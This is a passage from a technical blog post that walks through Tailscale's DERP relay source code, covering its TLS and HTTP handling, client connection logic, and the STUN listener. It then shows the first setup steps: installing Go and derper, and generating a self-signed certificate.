class="string">&quot;dev&quot;</span>, <span class="literal">false</span>, <span 
class="string">&quot;run in localhost development mode (overrides -a)&quot;</span>)</span><br><span class="line">addr       = flag.String(<span class="string">&quot;a&quot;</span>, <span class="string">&quot;:443&quot;</span>, <span class="string">&quot;server HTTP/HTTPS listen address, in form \&quot;:port\&quot;, \&quot;ip:port\&quot;, or for IPv6 \&quot;[ip]:port\&quot;. If the IP is omitted, it defaults to all interfaces. Serves HTTPS if the port is 443 and/or -certmode is manual, otherwise HTTP.&quot;</span>)</span><br><span class="line">httpPort   = flag.Int(<span class="string">&quot;http-port&quot;</span>, <span class="number">80</span>, <span class="string">&quot;The port on which to serve HTTP. Set to -1 to disable. The listener is bound to the same IP (if any) as specified in the -a flag.&quot;</span>)</span><br><span class="line">stunPort   = flag.Int(<span class="string">&quot;stun-port&quot;</span>, <span class="number">3478</span>, <span class="string">&quot;The UDP port on which to serve STUN. The listener is bound to the same IP (if any) as specified in the -a flag.&quot;</span>)</span><br><span class="line">configPath = flag.String(<span class="string">&quot;c&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;config file path&quot;</span>)</span><br><span class="line">certMode   = flag.String(<span class="string">&quot;certmode&quot;</span>, <span class="string">&quot;letsencrypt&quot;</span>, <span class="string">&quot;mode for getting a cert. 
possible options: manual, letsencrypt&quot;</span>)</span><br><span class="line">certDir    = flag.String(<span class="string">&quot;certdir&quot;</span>, tsweb.DefaultCertDir(<span class="string">&quot;derper-certs&quot;</span>), <span class="string">&quot;directory to store LetsEncrypt certs, if addr&#x27;s port is :443&quot;</span>)</span><br><span class="line">hostname   = flag.String(<span class="string">&quot;hostname&quot;</span>, <span class="string">&quot;derp.tailscale.com&quot;</span>, <span class="string">&quot;LetsEncrypt host name, if addr&#x27;s port is :443&quot;</span>)</span><br><span class="line">runSTUN    = flag.Bool(<span class="string">&quot;stun&quot;</span>, <span class="literal">true</span>, <span class="string">&quot;whether to run a STUN server. It will bind to the same IP (if any) as the --addr flag value.&quot;</span>)</span><br><span class="line">runDERP    = flag.Bool(<span class="string">&quot;derp&quot;</span>, <span class="literal">true</span>, <span class="string">&quot;whether to run a DERP server. The only reason to set this false is if you&#x27;re decommissioning a server but want to keep its bootstrap DNS functionality still running.&quot;</span>)</span><br><span class="line"></span><br><span class="line">meshPSKFile    = flag.String(<span class="string">&quot;mesh-psk-file&quot;</span>, defaultMeshPSKFile(), <span class="string">&quot;if non-empty, path to file containing the mesh pre-shared key file. 
It should contain some hex string; whitespace is trimmed.&quot;</span>)</span><br><span class="line">meshWith       = flag.String(<span class="string">&quot;mesh-with&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;optional comma-separated list of hostnames to mesh with; the server&#x27;s own hostname can be in the list&quot;</span>)</span><br><span class="line">bootstrapDNS   = flag.String(<span class="string">&quot;bootstrap-dns-names&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;optional comma-separated list of hostnames to make available at /bootstrap-dns&quot;</span>)</span><br><span class="line">unpublishedDNS = flag.String(<span class="string">&quot;unpublished-bootstrap-dns-names&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;optional comma-separated list of hostnames to make available at /bootstrap-dns and not publish in the list&quot;</span>)</span><br><span class="line">verifyClients  = flag.Bool(<span class="string">&quot;verify-clients&quot;</span>, <span class="literal">false</span>, <span class="string">&quot;verify clients to this DERP server through a local tailscaled instance.&quot;</span>)</span><br><span class="line"></span><br><span class="line">acceptConnLimit = flag.Float64(<span class="string">&quot;accept-connection-limit&quot;</span>, math.Inf(+<span class="number">1</span>), <span class="string">&quot;rate limit for accepting new connection&quot;</span>)</span><br><span class="line">acceptConnBurst = flag.Int(<span class="string">&quot;accept-connection-burst&quot;</span>, math.MaxInt, <span class="string">&quot;burst limit for accepting new connection&quot;</span>)</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>These options show that DERP is highly configurable and that TLS is optional. However, <strong>knowing that the DERP service can be switched to plain HTTP is not enough. We also need to see how client nodes are configured to use the DERP service, because if clients insist on TLS when accessing DERP,
turning off TLS on the DERP server will not help</strong>.</p><blockquote><p>The http-port flag only causes an additional HTTP listener to be started when the HTTPS service is enabled (<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/cmd/derper/derper.go#L284">cmd/derper/derper.go#L284</a>). This means <strong>the HTTP service is not actually required</strong>, and the requirement stated in the official documentation is redundant.</p></blockquote><h3 id="2-DERP-Client-配置相关">2. DERP Client Configuration</h3><p>The code in <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/tailcfg/derpmap.go#L112">tailcfg/derpmap.go</a> shows the DERP configuration that is pushed down to clients:</p><figure class="highlight go"><table><tr><td class="code"><pre><span class="line"><span class="comment">// tailcfg/derpmap.go</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// DERPNode describes a DERP packet relay node running within a DERPRegion.</span></span><br><span class="line"><span class="keyword">type</span> DERPNode <span class="keyword">struct</span> &#123;</span><br><span class="line"><span class="comment">// Name is a unique node name (across all regions).</span></span><br><span class="line"><span class="comment">// It is not a host name.</span></span><br><span class="line"><span class="comment">// It&#x27;s typically of the form &quot;1b&quot;, &quot;2a&quot;, &quot;3b&quot;, etc. 
(region</span></span><br><span class="line"><span class="comment">// ID + suffix within that region)</span></span><br><span class="line">Name <span class="type">string</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// RegionID is the RegionID of the DERPRegion that this node</span></span><br><span class="line"><span class="comment">// is running in.</span></span><br><span class="line">RegionID <span class="type">int</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// HostName is the DERP node&#x27;s hostname.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// It is required but need not be unique; multiple nodes may</span></span><br><span class="line"><span class="comment">// have the same HostName but vary in configuration otherwise.</span></span><br><span class="line">HostName <span class="type">string</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// CertName optionally specifies the expected TLS cert common</span></span><br><span class="line"><span class="comment">// name. If empty, HostName is used. 
If CertName is non-empty,</span></span><br><span class="line"><span class="comment">// HostName is only used for the TCP dial (if IPv4/IPv6 are</span></span><br><span class="line"><span class="comment">// not present) + TLS ClientHello.</span></span><br><span class="line">CertName <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// IPv4 optionally forces an IPv4 address to use, instead of using DNS.</span></span><br><span class="line"><span class="comment">// If empty, A record(s) from DNS lookups of HostName are used.</span></span><br><span class="line"><span class="comment">// If the string is not an IPv4 address, IPv4 is not used; the</span></span><br><span class="line"><span class="comment">// conventional string to disable IPv4 (and not use DNS) is</span></span><br><span class="line"><span class="comment">// &quot;none&quot;.</span></span><br><span class="line">IPv4 <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// IPv6 optionally forces an IPv6 address to use, instead of using DNS.</span></span><br><span class="line"><span class="comment">// If empty, AAAA record(s) from DNS lookups of HostName are used.</span></span><br><span class="line"><span class="comment">// If the string is not an IPv6 address, IPv6 is not used; the</span></span><br><span class="line"><span class="comment">// conventional string to disable IPv6 (and not use DNS) is</span></span><br><span class="line"><span class="comment">// &quot;none&quot;.</span></span><br><span class="line">IPv6 <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Port optionally specifies a STUN port to use.</span></span><br><span class="line"><span 
class="comment">// Zero means 3478.</span></span><br><span class="line"><span class="comment">// To disable STUN on this node, use -1.</span></span><br><span class="line">STUNPort <span class="type">int</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// STUNOnly marks a node as only a STUN server and not a DERP</span></span><br><span class="line"><span class="comment">// server.</span></span><br><span class="line">STUNOnly <span class="type">bool</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// DERPPort optionally provides an alternate TLS port number</span></span><br><span class="line"><span class="comment">// for the DERP HTTPS server.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// If zero, 443 is used.</span></span><br><span class="line">DERPPort <span class="type">int</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// InsecureForTests is used by unit tests to disable TLS verification.</span></span><br><span class="line"><span class="comment">// It should not be set by users.</span></span><br><span class="line">InsecureForTests <span class="type">bool</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// STUNTestIP is used in tests to override the STUN server&#x27;s IP.</span></span><br><span class="line"><span class="comment">// If empty, it&#x27;s assumed to be the same as the DERP server.</span></span><br><span class="line">STUNTestIP <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span 
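class="comment">// CanPort80 specifies whether this DERP node is accessible over HTTP</span></span><br><span class="line"><span class="comment">// on port 80 specifically. This is used for captive portal checks.</span></span><br><span class="line">CanPort80 <span class="type">bool</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>We can specify <strong>the ports the client uses for the DERP service and the STUN service</strong>, and, through a test-only field (InsecureForTests), <strong>whether the client verifies the server's TLS certificate</strong>. From this glimpse, the client side looks fairly configurable as well.</p><blockquote><p>Note, however, that the client-side configuration only shows that <strong>a client can connect to the DERP server's HTTPS service with TLS verification disabled (TLS-Insecure)</strong>; <strong>it does not say that a client can connect to the DERP server's plain HTTP service</strong>. That needs further investigation.</p></blockquote><h3 id="3-DERP-服务连接逻辑">3. DERP connection logic</h3><p>So how does a tailscale node actually talk to a DERP server? Three files matter, listed from the highest layer to the lowest:</p><ul><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/wgengine/magicsock/magicsock.go">wgengine/magicsock/magicsock.go</a>: the key function <code>sendAddr</code> sends a single packet either to a DERP server or directly to a peer. As a whole, this file implements the higher-level features: updating endpoints, tracking network state, the top-level send and receive paths, and probing for hole-punching paths.</li><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/wgengine/magicsock/derp.go#L256">wgengine/magicsock/derp.go</a>: the key function here is <code>derpWriteChanOfAddr</code>, which sets up the (fairly involved) connection to a single DERP server and handles its messages.</li><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go">derp/derphttp/derphttp_client.go</a>: implements the low-level operations against a DERP server: connecting, and sending and receiving data.</li></ul><blockquote><p>These files are long, so I will not walk through them in detail; reading them yourself is the best way to appreciate how neatly they are put together.</p></blockquote><p>We focus on the last file, because the low-level code is what decides whether a connection can be made without TLS (that is, over plain HTTP; if HTTP works, there is no need for <strong>pseudo-HTTPS with certificate verification turned off</strong>).</p><p>Normally tailscale connects to and talks with only one node in a given Region; even when a Region contains several redundant nodes, it still connects to just one of them:</p><ol><li><p>The client <strong>tries to create</strong> a DERP Region Client: the derpWriteChanOfAddr function - <a 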
href="https://github.com/tailscale/tailscale/blob/86c8ab75/wgengine/magicsock/derp.go#L321">wgengine/magicsock/derp.go#L321</a></p></li><li><p>It <strong>actually creates</strong> the Client struct for the DERP Region: the NewRegionClient function - <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L109">derp/derphttp/derphttp_client.go#L109</a></p></li><li><p>The client dials the DERP Region and <strong>obtains a TCP connection (note: not a TLS connection)</strong>: the dialRegion function - <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L570">derp/derphttp/derphttp_client.go#L570</a></p></li><li><p>Once it has the TCP connection to the DERP Region, it decides whether to use HTTPS: <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L392">derp/derphttp/derphttp_client.go#L392</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L426">derp/derphttp/derphttp_client.go#L426</a></p><blockquote><p>The code below first takes the <strong>default branch</strong> of the switch, then reaches the <code>c.useHTTPS()</code> check, which decides whether this connection uses HTTPS.</p></blockquote> <figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(c *Client)</span></span> connect(ctx context.Context, caller <span class="type">string</span>) (client *derp.Client, connGen <span class="type">int</span>, err <span class="type">error</span>) &#123;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> node *tailcfg.DERPNode <span class="comment">// nil when using c.url to dial</span></span><br><span class="line"><span class="keyword">switch</span> &#123;</span><br><span class="line"><span class="keyword">case</span> useWebsockets():</span><br><span class="line">...</span><br><span class="line"><span class="keyword">case</span> c.url != <span class="literal">nil</span>:</span><br><span class="line">c.logf(<span class="string">&quot;%s: connecting to %v&quot;</span>, caller, c.url)</span><br><span class="line">tcpConn, err = c.dialURL(ctx)</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line">c.logf(<span class="string">&quot;%s: connecting to derp-%d (%v)&quot;</span>, caller, reg.RegionID, reg.RegionCode)</span><br><span class="line">tcpConn, node, err = c.dialRegion(ctx, reg)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, <span class="number">0</span>, err</span><br><span class="line">&#125;</span><br><span 
class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> httpConn net.Conn        <span class="comment">// a TCP conn or a TLS conn; what we speak HTTP to</span></span><br><span class="line"><span class="keyword">var</span> serverPub key.NodePublic <span class="comment">// or zero if unknown (if not using TLS or TLS middlebox eats it)</span></span><br><span class="line"><span class="keyword">var</span> serverProtoVersion <span class="type">int</span></span><br><span class="line"><span class="keyword">var</span> tlsState *tls.ConnectionState</span><br><span class="line"><span class="keyword">if</span> c.useHTTPS() &#123;</span><br><span class="line">tlsConn := c.tlsClient(tcpConn, node)</span><br><span class="line">httpConn = tlsConn</span><br><span class="line"></span><br><span class="line"><span class="comment">// Force a handshake now (instead of waiting for it to</span></span><br><span class="line"><span class="comment">// be done implicitly on read/write) so we can check</span></span><br><span class="line"><span class="comment">// the ConnectionState.</span></span><br><span class="line"><span class="keyword">if</span> err := tlsConn.Handshake(); err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, <span class="number">0</span>, err</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ol><p><code>Client.useHTTPS</code> is how the client decides whether to use HTTPS when connecting to a DERP server. The code below shows that when a client connects to a DERP server, <strong>it will almost always use HTTPS</strong>. The reason is simple: <strong>the url field of a DERP Region Client is nil</strong>, so unless the debug knob is set, it uses HTTPS.</p><blockquote><p>Turning on a debug knob by hand or patching the source code just to run a DERP service is rather dirty, and I would rather not; I prefer to leave the code untouched whenever possible. So here I simply enable HTTPS.</p></blockquote><figure 
class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// derp/derphttp/derphttp_client.go</span></span><br><span class="line"><span class="comment">// --------------------------------</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Client is a DERP-over-HTTP client.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// It automatically reconnects on error retry. 
That is, a failed Send or</span></span><br><span class="line"><span class="comment">// Recv will report the error and not retry, but subsequent calls to</span></span><br><span class="line"><span class="comment">// Send/Recv will completely re-establish the connection (unless Close</span></span><br><span class="line"><span class="comment">// has been called).</span></span><br><span class="line"><span class="keyword">type</span> Client <span class="keyword">struct</span> &#123;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="comment">// Either url or getRegion is non-nil:</span></span><br><span class="line">url       *url.URL</span><br><span class="line">getRegion <span class="function"><span class="keyword">func</span><span class="params">()</span></span> *tailcfg.DERPRegion</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="comment">// debugDERPUseHTTP tells clients to connect to DERP via HTTP on port</span></span><br><span class="line"><span class="comment">// 3340 instead of HTTPS on 443.</span></span><br><span class="line"><span class="keyword">var</span> debugUseDERPHTTP = envknob.RegisterBool(<span class="string">&quot;TS_DEBUG_USE_DERP_HTTP&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(c *Client)</span></span> useHTTPS() <span class="type">bool</span> &#123;</span><br><span class="line"><span class="keyword">if</span> c.url != <span class="literal">nil</span> &amp;&amp; c.url.Scheme == <span class="string">&quot;http&quot;</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> debugUseDERPHTTP() 
&#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>So we can now conclude: <strong>under normal conditions, DERP relay traffic always goes over HTTPS (optionally without TLS certificate verification)</strong>.</p><p>As an aside, can the url field of <code>derphttp.Client</code> ever be <code>http</code>? The only call site of <strong>the function that creates a Client with a url field</strong> is shown below. The URL scheme is hard-coded to <strong>https</strong>. This feature is presumably meant for Tailscale's own official domains, so it is of little use to us:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/mesh.go</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">startMeshWithHost</span><span class="params">(s *derp.Server, host <span class="type">string</span>)</span></span> <span class="type">error</span> &#123;</span><br><span class="line">logf := logger.WithPrefix(log.Printf, fmt.Sprintf(<span class="string">&quot;mesh(%q): &quot;</span>, host))</span><br><span class="line">c, err := derphttp.NewClient(s.PrivateKey(), <span class="string">&quot;https://&quot;</span>+host+<span class="string">&quot;/derp&quot;</span>, logf)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> err</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 
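id="4-WebSocket">4. WebSocket</h3><p>While reading the DERP code, I noticed that it also supports relaying websocket traffic, which made me curious.</p><p>At first I assumed that DERP relays traffic through websocket over HTTPS. After some searching and code reading, it turned out not to be the case: rather, <strong>tailscale also supports p2p communication over websocket</strong>.</p><p>The developers are trying to make Tailscale run in the browser, which is where it gets interesting. So which browser projects can be combined with Tailscale today? I found this one - <a href="https://labs.leaningtech.com/blog/webvm-virtual-machine-with-networking-via-tailscale">How we added full networking to WebVM via Tailscale</a></p><p>In one sentence: <strong>WebVM is a small, well-crafted Linux VM that runs in the browser; combined with tailscale, it lets us reach our tailscale network directly from the browser through WebVM</strong>.</p><p>This caught my attention, because I had been wondering whether to expose a dedicated port on one of my machines for a web SSH service, so that I could still reach my tailscale network from an unfamiliar machine.</p><p>Now I can SSH into a remote machine from WebVM in the browser, which does exactly what I wanted.</p><p>Here is a screenshot of it in use. WebVM lives at <a href="https://webvm.io/">https://webvm.io/</a></p><p><img src="/2023/11/tailscale-derp/Untitled.png" alt="Untitled"></p><p>While the WebVM session is alive, the VM temporarily joins the tailscale network; when the session ends, it is removed from the network automatically:</p><p><img src="/2023/11/tailscale-derp/Untitled%201.png" alt="Untitled"></p><p>The sad part is that tailscale inside WebVM does not really support MagicDNS yet, so you have to type IP addresses by hand to reach remote machines; hostnames do not work.</p><h3 id="5-STUN-服务">5. 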
STUN service</h3><p>STUN is a service used for NAT detection. In theory, the closer the STUN server sits to the two peers the better, because that reduces the number of NAT layers to traverse. However, <strong>the original STUN protocol</strong> requires the STUN server to have <strong>at least two public IPs</strong> for thorough NAT type detection: with two public IPs the server has two egress points and can act as "two" devices to better determine the peer's NAT type.</p><p>That requirement is rather harsh: even one public IP is hard to come by, let alone two, and <strong>both public IPs must be bound to the same device</strong>, which makes it harder still. The good news is that Tailscale's STUN does not ask for that much. Its STUN UDP service does exactly one thing: <strong>accept a UDP packet from a peer and tell the peer the IP:Port pair it currently sees for that peer's NAT:</strong></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/derper.go</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">serverSTUNListener</span><span class="params">(ctx context.Context, pc *net.UDPConn)</span></span> &#123;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">for</span> &#123;</span><br><span class="line"><span class="comment">// 1. 
Read a packet from the UDP connection</span></span><br><span class="line">n, ua, err = pc.ReadFromUDP(buf[:])</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">continue</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 2. Parse the packet to extract the txid, mainly so responses can be matched to requests</span></span><br><span class="line">pkt := buf[:n]</span><br><span class="line">...</span><br><span class="line">txid, err := stun.ParseBindingRequest(pkt)</span><br><span class="line">...</span><br><span class="line"><span class="comment">// 3. Pack the public IP:Port the server sees on the UDP connection together with the txid and send it back to the client</span></span><br><span class="line">addr, _ := netip.AddrFromSlice(ua.IP)</span><br><span class="line">res := stun.Response(txid, netip.AddrPortFrom(addr, <span class="type">uint16</span>(ua.Port)))</span><br><span class="line">_, err = pc.WriteTo(res, ua)</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This STUN service is very simple. It handles only the simplest part of NAT detection: <strong>telling the client how it looks from the server's public vantage point</strong>.</p><p>Hole punching is not that simple, though. <strong>Tailscale also uses the discovery-message side channel carried over DERP, plus other NAT detection tricks, to traverse NATs</strong>.</p><p>This is the place to link the Tailscale blog post, which is well worth reading: <a href="https://tailscale.com/blog/how-nat-traversal-works/">How NAT traversal works - Tailscale Blog</a>. For Chinese readers I recommend this translation even more: <a href="https://arthurchiao.art/blog/how-nat-traversal-works-zh/">[译] NAT 穿透是如何工作的：技术原理及企业级实践（Tailscale, 2020）- arthurchiao’s blog</a>, which is very easy to follow.</p><p>I will not cover Tailscale's full hole-punching logic here, since the focus is on setting up a DERP service; the articles above have the details, and the machinery is too intricate to summarize briefly. The only reason STUN comes up here is to point out that <strong>Tailscale's STUN service needs nothing more than one open UDP port; there are no other demanding requirements</strong>.</p><h2 id="四、DERP-测试搭建">IV. DERP test setup</h2><h3 id="1-安装-derper-服务">1. 
<strong>Install derper</strong></h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Download the latest release from https://go.dev/dl/ (use the official tarball, not apt-get install golang)</span></span><br><span class="line">wget https://go.dev/dl/go1.21.3.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">rm</span> -rf /usr/local/go &amp;&amp; tar -C /usr/local -xzf go1.21.3.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">rm</span> go1.21.3.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/local/go/bin</span><br><span class="line"></span><br><span class="line"><span class="comment"># Check that the installation succeeded</span></span><br><span class="line">go version</span><br><span class="line"><span class="comment"># Check that GOROOT and GOPATH are non-empty &amp; accessible</span></span><br><span class="line">go <span class="built_in">env</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Configure the Go module proxy and install derper</span></span><br><span class="line">go <span class="built_in">env</span> -w GOPROXY=https://goproxy.cn,direct</span><br><span class="line">go install tailscale.com/cmd/derper@latest</span><br><span class="line"><span class="comment"># Install derpprobe to help test derper</span></span><br><span class="line">go install tailscale.com/cmd/derpprobe@latest</span><br></pre></td></tr></table></figure><h3 id="2-创建自签名证书">2. 
Create a self-signed certificate</h3><p>The self-signed certificate exists mainly to satisfy derper so that it will serve HTTPS. You could patch derper to bypass this requirement instead, but that makes later upgrades of derper inconvenient.</p><p>A few things to watch out for when creating the certificate:</p><ol><li><strong>First pick any <em>HostName</em></strong>; I chose <code>kiprey-derp</code>. Remember it, because it is used later when signing the certificate, when making requests, and so on.</li><li>After generation, the private key file and the certificate file must both be named with <em>HostName</em> as the prefix.</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> ~/certdir &amp;&amp; <span class="built_in">cd</span> ~/certdir</span><br><span class="line"><span class="comment"># 1. 
Generate the private key</span></span><br><span class="line">$ DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line">$ openssl genpkey -algorithm RSA -out <span class="variable">$&#123;DERP_HOST&#125;</span>.key   </span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. Generate the certificate signing request (CSR):</span></span><br><span class="line">$ openssl req -new -key <span class="variable">$&#123;DERP_HOST&#125;</span>.key -out <span class="variable">$&#123;DERP_HOST&#125;</span>.csr</span><br><span class="line"><span class="comment"># Just press Enter at every prompt to leave the fields empty.</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. Generate the self-signed certificate, valid for 100 years so this never has to be redone</span></span><br><span class="line">$ openssl x509 -req \</span><br><span class="line">-days 36500 \</span><br><span class="line">-<span class="keyword">in</span> <span class="variable">$&#123;DERP_HOST&#125;</span>.csr \</span><br><span class="line">-signkey <span class="variable">$&#123;DERP_HOST&#125;</span>.key \</span><br><span class="line">-out <span class="variable">$&#123;DERP_HOST&#125;</span>.crt \</span><br><span class="line">-extfile &lt;(<span class="built_in">printf</span> <span class="string">&quot;subjectAltName=DNS:<span class="variable">$&#123;DERP_HOST&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4. 
